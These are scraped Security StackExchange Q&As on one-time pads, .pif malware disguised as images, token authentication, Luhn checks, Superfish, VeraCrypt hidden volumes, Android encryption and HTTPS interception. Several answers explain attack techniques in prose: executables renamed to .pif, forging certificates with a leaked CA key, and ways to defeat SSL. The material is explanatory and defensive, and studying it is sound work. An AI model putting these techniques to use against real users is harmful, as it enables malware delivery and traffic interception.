81,462 | I'm currently reading about one time pad encryption, and I have a question. They say OTP encryption is unbreakable, and this can be proved mathematically. This is provided that the key used is truly random and is used only one time, right? What if I come with a whole system (can be software or hardware or a combination of both) to force these two conditions? Will I have the best & ideal encryption solution? Say for example the two sides willing to exchange information are getting the keys by connecting to a server that is online all the time. The server will ensure the keys generated are random, and will ensure that a key is never used again. The users at each side will only have to have an internet connection and a mechanism to exchange information. The information will travel via the internet encrypted using the one time pad key generated randomly by the server. Am I making any sense here? I just started reading about one time pad, and started wondering about this. There are many websites that will tell you that one time pad isn't practical at all, because you can't really come up with a truly random number or something like this. Addition: Do these guys offer anything special in key distribution? They say they have perfected implementing OTP over time. http://www.mils.com/en/technology/unbreakable-encryption/#1 | Key distribution is the problem. In your scenario, you use a server to communicate the one-time pads to the users. But how is that communication protected? Not by a one-time pad, or it wouldn't be necessary. Let's say it's SSL with AES 128. Then, wham, your cryptosystem is as secure as SSL with AES 128 - pretty secure, but not as secure as a one-time pad. The mils guys you reference appear to be offering physical devices which you load a one-time keystream onto (and can use it from). Again, key distribution is a problem. You could buy two hard drives, load terabytes of keystream on them, and send one to your buddy... how? Do you trust USPS? Fedex? Courier? Diplomatic pouch? All of these can be compromised. The only perfectly encrypted way to send them would be to encrypt them with a one-time pa... crap, it happened again. | {
"source": [
"https://security.stackexchange.com/questions/81462",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68183/"
]
} |
81,677 | I was reading up on FireEye and came across this NYTimes article detailing a Skype chat where an image was sent laden with malware : Quote: To gain access to information on the devices..., hackers posed as women on Skype, identified the types of devices the targets were using and sent photos laden with malware. The second photo was a particularly potent piece of malware that copied files from the targets computer I know exif data and IPTC headers exist in images and am pretty sure you could stuff some extra info in an image file using FileMagic mimetype header info, but how is it possible to embed executable code in an image? The image file format was pif so unless the computer had an app that opened the file and showed a picture while secretly exectuing code, I dont see how its possible. | The answer is simple. That was not a photo. And .pif is not an image format. Count on NYTimes to provide correct technical info. As the log on NYTimes's article says, and as FireEye's actual report confirms, the file used was a .pif file . It's one of the less known of Windows's executable file extensions. .pif is legacy from MS-DOS, like .com. It's intended to be a "program information file" (hence the name), storing a shortcut to a (DOS) program along with various info to the system on how to treat it. Even today, Windows gives .pif files a shortcut-type icon. The funny thing is that, today, Windows doesn't really care if the .pif is really just a program information file. Try it: rename any .exe file into a .pif and run it. There might be some difference like the icon not displaying, but that's all. That's what uniform treatment of files of different formats gets you. Thanks, Microsoft! Why does this happen? Short answer: Because Windows . Longer answer: Windows runs a .pif through ShellExecute , which technically should find a suitable program to open a file and then use it to open it. With .pif files, it first checks if it is really a file that points to an MS-DOS executable. If it doesn't conform to the .pif file format, ShellExecute checks if it contains executable code. If it does, it gets run as if it was a .exe. Why? Because Windows! What did the suuper-scary genius hackers do? These guys didn't bother doing anything complicated: they made a self-extracting-and-executing SFXRAR archive out of a virus installer and a program (probably just a .bat) opening an image of a girl that they found on the internet, renamed that devilish contraption into a .pif file and sent it to the hapless freedom fighter. Why did they use .pif? For two reasons, obviously: Few people know that it can run as an executable file ( thanks, Microsoft! ) It obviously sounds like .gif or .tiff or .pdf or something very image-y . Even you didn't doubt from its name that it was an image format, didn't you, OP? ;) Concerning your actual question ("how is it possible to embed executable code in an image"). Yes, it is possible to execute code via a specially crafted image provided it is opened in a vulnerable program. This can be done by exploiting an attack like a buffer overflow . But these specific hackers were most probably not clever enough for this. Edit Interesting note: these guys actually used DarkComet, which has the ability to generate compressed executables with different extensions, .pif being in their list. I'm not sure about displaying an image, but this could be a functionality added in a newer version. Another edit I see you're asking on how to protect against this specific " vulnerability ". The answer is simple. First, make sure Windows shows you file extensions . Windows mostly hides them by default ( thanks, Microsoft! ) Then learn this by heart: .exe .com .cmd .bat .pif .vb .vba .vbs .msi .reg .ws .wsc .wsf .cpl .lnk . These are the best known file types that can easily execute potentially malicious code or otherwise harm your computer if opened, whether you have vulnerable applications installed or not. If someone sends you such a file saying it's an image of a pretty girl, you can be sure it's another low-profile hacker like these syrian guys. Another option is simply being pro-active and checking and double-checking any downloaded file with an unfamiliar file format. It could be malware, you know. As for real images with exploits... you could probably try keeping your software up to date. | {
"source": [
"https://security.stackexchange.com/questions/81677",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10505/"
]
} |
81,756 | I am trying to get a handle on some terms and mechanisms and find out how they relate to each other or how they overlap. Authenticating a theoretical web application and mobile application is the focus. The focus is on the exact difference between token based authentication and cookie based authentication and if/how they intersect. HTTP basic/digest and complex systems like oauth/aws auth do not interest me . I have a few assertions which I would like to put out there and see if they are correct. Only using authentication tokens, without sessions, is possible in mobile applications. In a browser context, you need cookies to persist the tokens client-side. You exchange your credentials (usually username/pw) for a token which can be limited in scope and time. But this also means that the token and everything relating to it must be persisted and handled by the server as well. Tokens can be revoked server-side. Cookies do not have that option and will/should expire. Using only cookies means that sessionId is related to the user account and not limited in any way. I am hoping I am not too far off the mark and am thankful for any help! | In Session-based Authentication the Server does all the heavy lifting server-side. Broadly speaking a client authenticates with its credentials and receives a session_id (which can be stored in a cookie) and attaches this to every subsequent outgoing request. So this could be considered a "token" as it is the equivalent of a set of credentials. There is however nothing fancy about this session_id string. It is just an identifier and the server does everything else. It is stateful. It associates the identifier with a user account (e.g. in memory or in a database). It can restrict or limit this session to certain operations or a certain time period and can invalidate it if there are security concerns. More importantly it can do and change all of this on the fly. Furthermore it can log the user's every move on the website(s). Possible disadvantages are bad scale-ability (especially over more than one server farm) and extensive memory usage. In Token-based Authentication no session is persisted server-side (stateless). The initial steps are the same. Credentials are exchanged against a token which is then attached to every subsequent request (it can also be stored in a cookie). However for the purpose of decreasing memory usage, easy scale-ability and total flexibility (tokens can be exchanged with another client) a string with all the necessary information is issued (the token) which is checked after each request made by the client to the server. There are a number of ways to use/create tokens: Using a hash mechanism e.g. HMAC-SHA1 token = user_id|expiry_date|HMAC(user_id|expiry_date, k) where user_id and expiry_date are sent in plaintext with the resulting hash attached ( k is only know to the server). Encrypting the token symmetrically e.g. with AES token = AES(user_id|expiry_date, x) where x represents the en-/decryption key. Encrypting it asymmetrically e.g. with RSA token = RSA(user_id|expiry_date, private key) Production systems are usually more complex than those two archetypes. Amazon for example uses both mechanisms on its website. Also hybrids can be used to issue tokens as described in 2 and also associate a user session with it for user tracking or possible revocation and still retain the client flexibility of classic tokens. Also OAuth 2.0 uses short-lived and specific bearer-tokens and longer-lived refresh tokens e.g. to get bearer-tokens. Sources: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/ https://stackoverflow.com/questions/1283594/securing-cookie-based-authentication https://web.archive.org/web/20170913233103/https://auth0.com/blog/angularjs-authentication-with-cookies-vs-token/ Demystifying Web Authentication (Stateless Session Cookies) https://scotch.io/tutorials/the-ins-and-outs-of-token-based-authentication | {
"source": [
"https://security.stackexchange.com/questions/81756",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56944/"
]
} |
81,781 | I was renewing my Internet subscription through the online portal of my ISP. What struck me was when I was entering my credit card details, I entered the type of my credit card (MasterCard, Visa, AA, etc), and when I entered the numbers, there was one number that I entered wrong. When I pressed the submit button, the website automatically gave me an error that the card number I entered was invalid. I sense this was done locally in the browser and no data was pushed and checked on a server and a reply sent back. Is there any sequence of numbers each vendor has? Otherwise, how would the website (locally) know about the wrong number? | Checksums CC numbers, as well as pretty much any other well designed important numbers (e.g. account numbers in banks) tend to include a checksum to verify integrity of the number. While not a security feature (since it's trivial to calculate), a decent checksum algorithm can guarantee to always fail if (a) a single typo was made or (b) two neighbouring digits are swapped, which are the two most common errors when manually entering long numbers. http://rosettacode.org/wiki/Luhn_test_of_credit_card_numbers is an example of such a test. Issuer If a CC number is technically correct, it may still be not a real CC number. The method for verifying that is simple and complicated at the same time - generally, if you have appropriate access you are able to the look up the issuer institution for each range of card numbers, and then you ask the issuer[s card systems] if they think that this is a valid card. Well, the second part generally happens as a part of making a CC payment, but verifying the issuer is sometimes done before that as an extended test; but not on the client browser. | {
"source": [
"https://security.stackexchange.com/questions/81781",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60357/"
]
} |
81,801 | When I type example.com without any scheme into the browser bar and press Enter it is interpreted as HTTP://example.com , not HTTPS://example.com . Why? And where are the plans to fix this? (To be clear, I'm talking only about typed/pasted addresses coming from a "lazy" user, not about software-defined actions such as following scheme-relative URLs, window.location = "url" etc. And obviously typing/pasting HTTP://example.com must still work.) EDIT : As some answers point out sites already can mostly achieve this with redirects + HSTS. The central technical gain would be narrowing the first-connection problem (also addressed by HSTS preload but that can't scale to all sites). I can see how that's a weak justification for breaking things now ; what I'm more interested in is whether it's an obvious endgame in 5 years? 10? 20? I can see several problems on the way to defaulting to https interpretation: User experience with sites that only work over http. Defaulting to https would show an error but the user usually has no idea whether it should work, i.e. whether this site simply never worked over https or is this a downgrade attack. If the error page for this situation will contain an easy "did you mean http:...?" link(*), users will get used to clicking that on any site that doesn't work and we haven't gained much(?). And if it's not easy (e.g. user must edit https -> http , users won't use such browser. EDIT : I should have clarified that the error indication must be different from explicitly going to an HTTPS address which failed — this scenario is not so much "fail" as "the safe interpretation didn't work". And for starters, even "soft failing" automatically to HTTP with a warning bar on top would be OK. But I think we still gain 3 things: going to unsecure site is a conscious action, we educate users that unsecure HTTP is not normal , and we put pressure on sites to implement https. Inconvenience of having to type http:// in some cases. IMO completely outweighed by convenience of not having to type https:// in more cases. "Compatibility" with the historical default. I'm not sure if it's enshrined in some standard, but IMO it's clear we'll have to change it some day , so that's not a showstopper. Politics/economics: the CA system has its issues and browsers might be reluctant to pressure site admins to pay them (if they don't otherwise see value in that). Let's ignore money for a moment and pretend Let's Encrypt free CA has arrived. I can see why making the change right now can be controversial; what baffles me is why it's not widely discussed as the obvious long-term goal, with some staged plan a-la the SHA-2 certs deprection though maybe slower. What I see seems to assume http will remain default practically forever: Chrome's move to hiding http:// in URL bar is a step back. The first step towards https default should have been showing http in red; at some later time eventually move to hiding https:// (only showing green padlock)... HSTS moves in the right direction but with cautious per-site opt-in. It's both weaker and stronger — sites opt in to forcing https even for explicit http urls, with no user recourse for errors — but the RFC doesn't even mention the idea that https could be a global default, or that browser default scheme is to blame for bootsrap MITM problem. I've seen DNSSEC mentioned as future vector for HSTS-like opt-in but again never saw proposals for opt-out... Also, are there any browsers (or extensions) offering this as an option? | Browsers are applications for end-users.
While the majority of sites is available by http (even if they just redirect to https) a significant part is not available by https.
Thus your proposal would break web surfing for a very large part of the users. It would break in a way they don't understand. Automatically downgrading to http if https fails would not make sense because an attacker could then just simply cause havoc with connections to port 443 to enforce downgrades. Once all but a few insignificant sites switched to https one could make the switch to a more secure default, but not yet. End-users would not understand what happened and probably just switch to an alternate browser or get some tips from somewhere on the internet to get back the old behavior. Security decisions have to be done with and not against the users. | {
"source": [
"https://security.stackexchange.com/questions/81801",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31246/"
]
} |
82,005 | With port knocking, you have to "knock" on specific ports in defined order to expose a port on which service is running. How about password knocking ? For example you have three passwords: A , B and C . None of them is correct by itself, but entered one-by-one in this order they will grant you access. Some scenarios to make this idea clearer: Scenario 1. You: Password A . Server: Invalid password. You: Password B . Server: Invalid password. You: Password C . Server: Password accepted . Scenario 2. You: Password A . Server: Invalid password. You: Password C . Server: Invalid password. You: Password B . Server: Invalid password. Scenario 3. You: Password A . Server: Invalid password. You: Password B . Server: Invalid password. You: Password B . Server: Invalid password. You: Password C . Server: Invalid password. Scenario 4. You: Password A . Server: Invalid password. You: Password A . Server: Invalid password. You: Password B . Server: Invalid password. You: Password C . Server: Password accepted . I can't think of any drawbacks of this method over regular single password login. Moreover, it makes dictionary attacks exponentially harder with each added password. I realize it's security by obscurity and doesn't abolish the need for strong passwords. Password sequence itself is as strong as a concatenation of passwords used. Added security in this method comes from unexpectedly complex procedure. Is it a good idea? Is it a better idea than classic password? | The system outlined in the question is actually weaker than simply requiring a single password of length A+B+C, because it permits a class of attacks that can't be used against single passwords: Say your three-password combination is E F G . An attacker can send the passwords A B C D E F G , making five attacks ( A B C , B C D , C D E , D E F , and E F G ) for the price of two. The general term for this is a de Bruijn sequence , and it lets you attack any state-based system (such as a digital lock) using far fewer tries than there are possible combinations. | {
"source": [
"https://security.stackexchange.com/questions/82005",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68614/"
]
} |
82,035 | There has been quite a bit of concern noted relating to the recent discovery that Lenovo are pre-installing a piece of Adware (Superfish) which has the capability of intercepting SSL traffic from machines on which it is installed. What are the security risks of having OEMs or other companies installing this kind of software onto customers systems? | Having a proxy SSL certificate creates some privacy and security implications: Superfish can impersonate any site This does not mean that Superfish will do it (or is doing), but they have the power. As they have a Certification Authority Certificate , any certificate they generate will be valid and accepted. Certificate pinning does not protect you , either: "There are a number of cases where HTTPS connections are intercepted
by using local, ephemeral certificates. These certificates are signed
by a root certificate that has to be manually installed on the client.
Corporate MITM proxies may do this, several anti-virus/parental
control products do this and debugging tools like Fiddler can also do
this. Since we cannot break in these situations, user installed root
CAs are given the authority to override pins. We don't believe that
there will be any incompatibility issues." If you use Windows and EMET, Certificate Trust can protect you IF you configure it beforehand. But the process is manual and somewhat complicated. Superfish can intercept traffic As a trusted CA, Superfish can perform a MiTM attack on any site, and the average user will not detect the attack. Savvy users can see that the certificate was signed by a strange CA, if they know where to look. Superfish can inject code anywhere Even if the site is protected by SSL/TLS, Superfish can inject Javascript or HTML on every page. They just proxy the requests, make the request to the intended server, read the response, inject data, and send data to the user. And unless you are looking for it, you will never notice. Superfish can be used to install malware Like above, Superfish can add code to Windows updates, alter executables being downloaded, infect Java applets, Flash files and so on. Any download could be silently compromised. They could even change the origin site and put changed checksums on it, so even if you calculate the hash after downloading the files, they would look legit. Superfish can know every site you access The software monitors your browser and send data to Superfish. Even without the software, they can inject code on every site and track you everywhere. Anyone on the web can use its certificate The private key of the certificate has been compromised , so anyone knowing the key can use Superfish certificate to create valid SSL certificates for anything they want. Saying that they can does not mean or imply that they will , only that they have the power to do if they want (or are forced to). | {
"source": [
"https://security.stackexchange.com/questions/82035",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37/"
]
} |
82,056 | The site has already a discussion of the security risks of "Superfish". It seems to me that anything that tampers with the bits of one's connection is bad. If it tampers with TLS connections, it is evil. How can I determine if I am vulnerable to Superfish? Lenovo has issued a statement on Superfish (after they got caught red-handed) saying it has been "disabled." As I can no longer trust Lenovo, is there a way to remove it completely other than format c: ? Edit: the Lenovo statement linked above now has a list of model numbers on which Superfish may have been installed. Um, but it says "appeared" rather than "installed," rather like it sneaked on those computers in the middle of the night. | You can check to see if you're machine is vulnerable by browsing to this site: https://badssl.com/dashboard/ Everyone keeps saying that you need to completely reinstall a clean version of Windows. I would first try to remove Superfish first. To remove the executable you should be able to use the normal Windows Add/Remove programs method. I believe the executable is called Visual Discovery. To remove the certificate follow these steps from StackOverflow : FYI, this Superfish software is now a major news headline: http://arstechnica.com/security/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections/ It is preloaded by Lenovo (there may be other vendors). You have to
uninstall it, but that will not remove the certificate. To remove the
certificate, you must do the following: Run mmc.exe Go to File -> Add/Remove Snap-in Pick Certificates, click Add Pick Computer Account, click Next Pick Local Computer, click Finish Click OK Look under Trusted Root Certification Authorities -> Certificates. Find the one issued to Superfish and delete it. If you are really paranoid, the best solution would be to reformat
your laptop and install Windows with Microsoft media, not the factory
recovery stuff. While the above removes it from the Microsoft Trusted Store, this link indicates that the root certificate might be injected into browser trusted stores. Check that your browser also does not trust the Superfish Inc certificate. Chrome and IE both use the operating system's trusted root store. If you're using FireFox you need to manually remove it. Remove Trusted CA from FireFox Trusted Store Click the menu button, then choose Preferences Click the Advanced in the upper tab menu Then click Certificates in the lower tab menu. Click View Certificates Under the Authorities tab check for the Superfish Inc certificate If it's found, then click on the certificate and then click Delete or Distrust Finally click the Ok button to confirm that you're removing it. | {
"source": [
"https://security.stackexchange.com/questions/82056",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52741/"
]
} |
82,113 | Robert Graham detailed on the Errata Security blog how he was able to get the private key of the Superfish certificate. I understand that attackers can now use this key to generate certificates of their own which will be signed by the Superfish CA. Won’t the same attack work on other root certificates already on a computer? Why was the private key on the computer in the first place? | Unless the Superfish malware has been installed on your system, (which it might if you bought a Lenovo machine,) you don't have to worry. This attack worked because the secret it revealed was necessary for the malware to hijack the data; it is not a part of how legitimate certificates are authenticated. It helps to understand the relationships between a certificate, a public key, and a private key. A private key is a secret number used to sign messages with digital signatures (or to encrypt web traffic), and it has a matching public key that can be used to verify those signatures. A certificate is a public document that contains a public key; web site owners put their public keys onto certificates and send them to companies called Certificate Authorities (CAs) who digitally sign them to prove their certificates are genuine. The digital signatures ensure the document has not been changed, assuring you the public key it contains is the genuine key of the site you're visiting. CAs are companies everyone agrees to trust to only sign certificates from legitimate sources. They also have a private and public key pair. They keep the private key very secret, locked in a secure cryptographic device called a Hardware Security Module (HSM) and they restrict access to it so it can only be used to sign a customer's certificate when the customer generates a new key. But in order to be useful, everyone on the web needs to know their public keys. So these CAs put their own public key on a special certificate and sign it with their own private key ("self-signing"). They then send these self-signed "root certificates" to the browser vendors and OS vendors, who include them with their products. A real CA would never, ever, send out their private keys! The trusted authority root certificates are the documents that validate all the certificates of all the connections your computer makes. Thus, your computer has to trust them. This malware is installing an untrustworthy certificate in a position of ultimate trust, compromising the security of the machine by allowing anyone who knows this key to forge a certificate for any site, hiding evidence of their tampering. The malware abuses its position by generating phony public and private keys for every site you visit; after you connect it injects its payload into the web site's page. In order for your browser to trust these phony keys and not give you warnings, the malware generates a forged certificate that tricks your browser into believing the keys are legitimate. But like any certificate, the forgery needs to be signed by a trusted CA. To sign, the malware needs a public and private key, just like a real CA. Because the phony CA is forging these certificates right inside your computer, the private key needs to be inside your computer as well. It's impossible to keep such things secret from the owner of the computer, but they tried by taking some rudimentary steps to hide it. The blog you linked to described how he uncovered the secret. No legitimate certificate authority would ever allow their private key to be leaked, much less send it out to a bunch of random computer owners. There was a case where a certificate authority had their secret key leaked; their reputation was ruined and they went bankrupt in a month. Since your computer doesn't contain the private keys of the legitimate certificate authorities, there is no secret for an attacker to crack. | {
"source": [
"https://security.stackexchange.com/questions/82113",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8772/"
]
} |
82,362 | A scene in the documentary CitizenFour showed Snowden using a blanket to cover his head and the laptop screen. When asked by Greenwald about this, he answered affirmatively, but I couldn't really understand what Greenwald meant/said. What was Snowden mitigating by that action? | The Background The general situation was Snowden entering his password at that time, and he wanted to mitigate visual surveillance, let it be by observation or (hidden) cameras . It seems, Snowden didn't trust anything but his own laptop (if at all) during these first day(s) of contact with the journalists. He also offered the blanket to the others in the room when they were entering their credentials into their laptops, but they refused, probably regarding this as being overcautious. The Exact Scene (Original footage from Citizenfour by Laura Poitras) 37:35 [Snowden pulling blanket over his head/laptop] 37:44 Greenwald: Is that about the posibility of... 37:47 Snowden [still under blanket, interrupts] visual, yeah visual collection 37:50 [Greenwald looking around the room, seems not rather sure what to think and say] 37:55 Greenwald: I don't think at this point there is anything in this regard that will shock us. [laughter in room] Some general chit-chat about never leaving devices alone any more follows. | {
"source": [
"https://security.stackexchange.com/questions/82362",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47050/"
]
} |
82,408 | I have to log in on an HTTP website. There is a login form which contains inputs for username and password and as hidden inputs the sessionId. I am creating an application in which I have to access resources which just can be accessed if you are logged in on this website, so I provide a username and password input in my application to log in. I watched the HTTP requests now, and the HTTP POST request in which the login data is sent has the parameters password and username, so I could see my username and password in Fiddler non-encrypted, but I don't want to send my data unprotected. If the parameters of an HTTP POST request can be seen by tools like Fiddler in the clear, does this mean that my data is sent without any encryption to the server? Or is there any kind of encryption that is done which just isn't visible to me? | Ordinary HTTP of all sorts is unencrypted. If you want to protect your data, it has to be sent over HTTPS. | {
"source": [
"https://security.stackexchange.com/questions/82408",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68987/"
]
} |
82,596 | I am running a web server and watching what people request. I have been getting frequent traffic like: GET /phph/php/ph.php HTTP/1.1 or GET /mrmr/mrm/mr.php HTTP/1.1 Are these scans? Are the clients checking if my server is already compromised or are they checking if I am vulnerable? As far as I can tell, since I don't host such directories, such traffic is a scan for compromised machines; I do not know for sure because I think it unsafe to click the links Google provides when I search such things. | These types of spurious requests are very, very common. They are either looking to see if you are already compromised, or looking to get your server to throw an error to gather info about your server (from error messages). You aren't the only one: http://shadow.wolvesincalifornia.org/awstats/data/awstats092014.shadow.wolvesincalifornia.org.txt # URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 193
/admin.php 1 -
/root/back.css 1 -
/drdr/drd/dr.php 2 -
/hkhk/hkh/hk.php 1 -
/wp/2011/07/19/& 6 -
/ahah/aha/ah.php 1 -
/andro/back.css 1 -
/wp/comments/feed/ 1 -
/wjwj/wjw/wj.php 1 - We all get spammed by these requests. | {
"source": [
"https://security.stackexchange.com/questions/82596",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40706/"
]
} |
82,777 | I can't think of a reason as to why you'd want to create a hidden volume in VeraCrypt. It says because "you may be asked to hand the information," but why would I need to hand it over? Nobody has any proof of what may or may not be in that volume, so they can't claim that I'm doing something unlawful (assuming I was), because they literally have no proof of absolutely anything. Hence, they cannot make me hand over the password nor can they penalize me for defending my privacy and refusing to hand over my personal files without any proof that those files are somehow harmful (or whatever you wanna call it). Also, if you have to hand it over, it doesn't make sense that while there is 500mb/700mb occupied space when the files there only take 300mb. Where did the other 200mb go? ...But let's focus on #1, as that - in my opinion - is a more important point that just obliterates the suggested reason, far as I can figure. | Your first question is really a legal one, and you seem to be assuming two things: The attacker is a government of some sort. That government actually respects citizen privacy and requires some sort of reasonable suspicion before it can force people to give up encryption keys. Neither of those assumptions are necessarily true. For all you know, some random thief could grab your laptop while you are using it, notice a VeraCrypt file sitting on the desktop, and pull out a gun and force you to decrypt it. It's not super realistic, but definitely possible. And even if it is indeed a government, not all countries have privacy protections or require reasonable suspicion. Even in ones that do (e.g. US and many European countries), there have been lots of cases where courts have forced people to supply their decryption keys because it is deemed relevant to an investigation. Whether they have the authority to do so is a subject of current debate, especially in the US where there is supposed to be protection against self-incrimination. Here is one such case: http://www.cnet.com/news/judge-americans-can-be-forced-to-decrypt-their-laptops/ For your second question, try it out yourself: Create a 500mb outer volume, containing a 300mb hidden volume. Completely fill the hidden volume with files. Then mount the outer volume. The outer volume will still show 500mb of free space. How does this work? The idea is that you're never supposed to write to the outer volume once you have created it, as doing so could corrupt your hidden volume. If you open the outer volume, even veracrypt does not know that the hidden one exists. There is no way to tell that a hidden volume exists because the hidden volume is indistinguishable from free space (which is why veracrypt still shows 500mb free space when you mount the outer volume). That's the whole idea of plausible deniability; there is no technical way to prove that there is more encrypted data. | {
"source": [
"https://security.stackexchange.com/questions/82777",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69389/"
]
} |
82,910 | After upgrading to Android L on my Nexus 5, I was pleased to find that I can enable encryption using a pattern as the passphrase. However, it soon got me thinking. I'm guessing the encryption key is ultimately derived from the pattern which is very low entropy. I did a back-of-the-envelope calculation and I found that the total number of unique patterns on a 3x3 grid of dots come to just under a million. Even at 0.1 guesses per second, it would take a mere 115 days to search the entire keyspace. I started reading around and discovered a write-up detailing how Android does disk encryption . It seems to claim that Android L will use hardware-backed secure storage for storing and deriving the encryption key so it can essentially allow low entropy passphrases to still have the same amount of security. However, I don't quite understand why. Why does using a hardware-backed secure storage device suddenly allow low entropy passphrases to acheive strong security? Am I just missing something blatantly obvious? | Chip-based banking cards typically use a 4-digit PIN. It would take at most a few hours to try them all if the card didn't protect against brute force attempts. The card protects against brute force attempts by bricking itself after 3 consecutive failures. The adversary does not have access to a hash of the PIN (there are physical protections in the card that make it extremely hard to read its memory), but only to a black box that takes 4 digits as inputs and replies “yes” or “no”. The key to security here is that the adversary can only make online attempts, not offline attempts . Each attempt requires computation on the defending device, it is not just a matter of doing the math. An Android phone or any other computer can do the same thing with its storage encryption key. The key is not derived from the passphrase (or pattern), but stored somewhere and encrypted with the passphrase. Most storage encryption systems have this indirection so that changing the passphrase doesn't require re-encrypting the whole storage, and so that the storage can be effectively wiped by wiping the few bytes that make up encrypted key (the storage encryption key is uniformly random, so unlike a key derived from a passphrase it isn't subject to brute force: the adversary needs to obtain at least the encrypted storage key to gain a foothold). If the adversary can read the encrypted storage key, then they can make fast brute force attempts on the key on a cluster of PCs. But if the storage key is stored in tamper-resistant storage, then the adversary is unable to read it and can only submit passphrase attempts to the device, so the device can apply policies like “limit the rate of attempts to 3 per minute” or “require a second, longer passphrase after 10 failed attempts”. The new feature in Android L is upstream support for an encrypted storage key that isn't stored on the flash memory (from which it can be dumped with a bit of soldering or with root access), but instead in some protected memory (which may be accessible to TrustZone secure mode only ). Not all phones running Android L have such protected memory however, and even if it's present, there's no guarantee that it's used for the encryption. All Android L changes is providing the requisite code as part of the basic Android image, making it easier for phone vendors to integrate. Android provides an API to check whether the application keychain storage is in protected memory ). I don't know if there's a corresponding API to check the protection of the storage encryption key. | {
"source": [
"https://security.stackexchange.com/questions/82910",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12626/"
]
} |
83,026 | In the documentary film Citizenfour , Edward Snowden says about documents: I'm comfortable in my technical ability to protect [documents].
I mean you could literally shoot me or torture me
and I could not disclose the password, even if I wanted to.
I have the sophistication to do that. What technology/methods exist that would enable the scenario Edward Snowden is referring to when he claims to be able to create a protected file where he cannot disclose the password? | All of our answers are speculation, of course, but I suspect that the most likely way that the documents are protected are by following Bruce Schneier's advice regarding laptop security through airports: Step One: Before you board your plane, add another key to your
whole-disk encryption (it'll probably mean adding another "user") --
and make it random. By "random," I mean really random: Pound the
keyboard for a while, like a monkey trying to write Shakespeare. Don't
make it memorable. Don't even try to memorize it. Technically, this key doesn't directly encrypt your hard drive.
Instead, it encrypts the key that is used to encrypt your hard drive
-- that's how the software allows multiple users. So now there are two different users named with two different keys:
the one you normally use, and some random one you just invented. Step Two: Send that new random key to someone you trust. Make sure the
trusted recipient has it, and make sure it works. You won't be able to
recover your hard drive without it. Step Three: Burn, shred, delete or otherwise destroy all copies of
that new random key. Forget it. If it was sufficiently random and
non-memorable, this should be easy. Step Four: Board your plane normally and use your computer for the
whole flight. Step Five: Before you land, delete the key you normally use. At this point, you will not be able to boot your computer. The only
key remaining is the one you forgot in Step Three. There's no need to
lie to the customs official; you can even show him a copy of this
article if he doesn't believe you. Step Six: When you're safely through customs, get that random key back
from your confidant, boot your computer and re-add the key you
normally use to access your hard drive. And that's it. This is by no means a magic get-through-customs-easily card. Your
computer might be impounded, and you might be taken to court and
compelled to reveal who has the random key. To be even more secure, Snowden himself may not know who has the backup key--as the associate he gave it to may have passed it along elsewhere. Also, it is likely that the person that did receive the backup key from Snowden is in a different country than any likely attacker and is doing his or her best to stay very safe. EDIT: In response to the below comment, I decided to add the following advice: Create a dummy operating system that starts at the beginning of the laptop's hard drive. The encrypted operating system with sensitive information will be the following partition. Configure the laptop's bootloader to boot from the dummy operating system without your intervention. TrueCrypt had a similar hidden operating system feature where the TrueCrypt bootloader would accept two different passwords, giving access to two different operating systems. The hidden operating system was concealed with a bit of clever steganography. We can do something similar in Linux and LUKS, but without the steganography, by doing the following: Installing Linux twice--on two partitions. Encrypting both of them with LUKS. Configuring the bootloader (probably GRUB2) to boot the first Linux installation, and remove the entries for the second installation . Whenever you want to boot your second, secret installation, boot your laptop and reach the GRUB screen. Modify the bootloader entry (temporarily) directly from the boot screen to point to the second partition. Step four is not very user friendly, and we could get rid of it and make a separate bootloader entry for our secret operating system, but then anybody that looked at the screen could tell that there are two operating systems on the machine. An investigator can still tell, but now they must look at the laptop's hard drive with a partition editing tool. | {
"source": [
"https://security.stackexchange.com/questions/83026",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69607/"
]
} |
83,028 | My goal is to sniff the HTTPS traffic of some digital devices (AppleTV, game consoles, etc.), and decrypt the HTTPS packets in my local network. I cannot figure out a way by using some HTTPS debugging proxy tools like Charles or Fiddler, because they need to have a certificate installed on the device. I don't have access to the file system on the device, I cannot copy certificate. But I can set the proxy of the device to point to my laptop or using my laptop's hotspot. | The entire point of SSL is its resistance to eavesdropping by man-in-the-middle attacks like the one you're proposing. If you cannot make the client device trust your self-signed certificate, then your only options are: Intercept an initial HTTP request and never let the communication be upgraded to HTTPS (but this will not work if the if the client explicitly goes to an https://... URL) Pretend to be the server with your own self-signed certificate, and hope that the system making the request naively accepts a self-signed certificate (which is the decision-making equivalent to a user who ignores the browser's stern warnings about a possible MITM attack in progress) Check for susceptibility to known past attacks on SSL (Heartbleed, BEAST, etc.). Note that this option is most likely to be illegal, since it may require an attack on the server (which you don't own) rather than an attack on the client (which you do possibly do own) If you have many trillions of dollars available to you, you may have a few other options: Successfully compromise a worldwide-trusted certificate authority and use their secret signing key to produce forged certificates for your own keypair Purchase or discover a zero-day security vulnerability in a Web client, Web server, or (most preferably) SSL/TLS library used by the client or server Discover a crippling weakness in some underlying cryptographic primitive used by SSL (for example, completely breaking AES might do nicely) Spend trillions of dollars on computer hardware to perform brute force attacks on intercepted encrypted communications If you have unlimited physical access to the device, almost certainly an attack on the device's own trusted certificate store would be easier than an attack on SSL (though it may also be far from easy). | {
"source": [
"https://security.stackexchange.com/questions/83028",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69612/"
]
} |
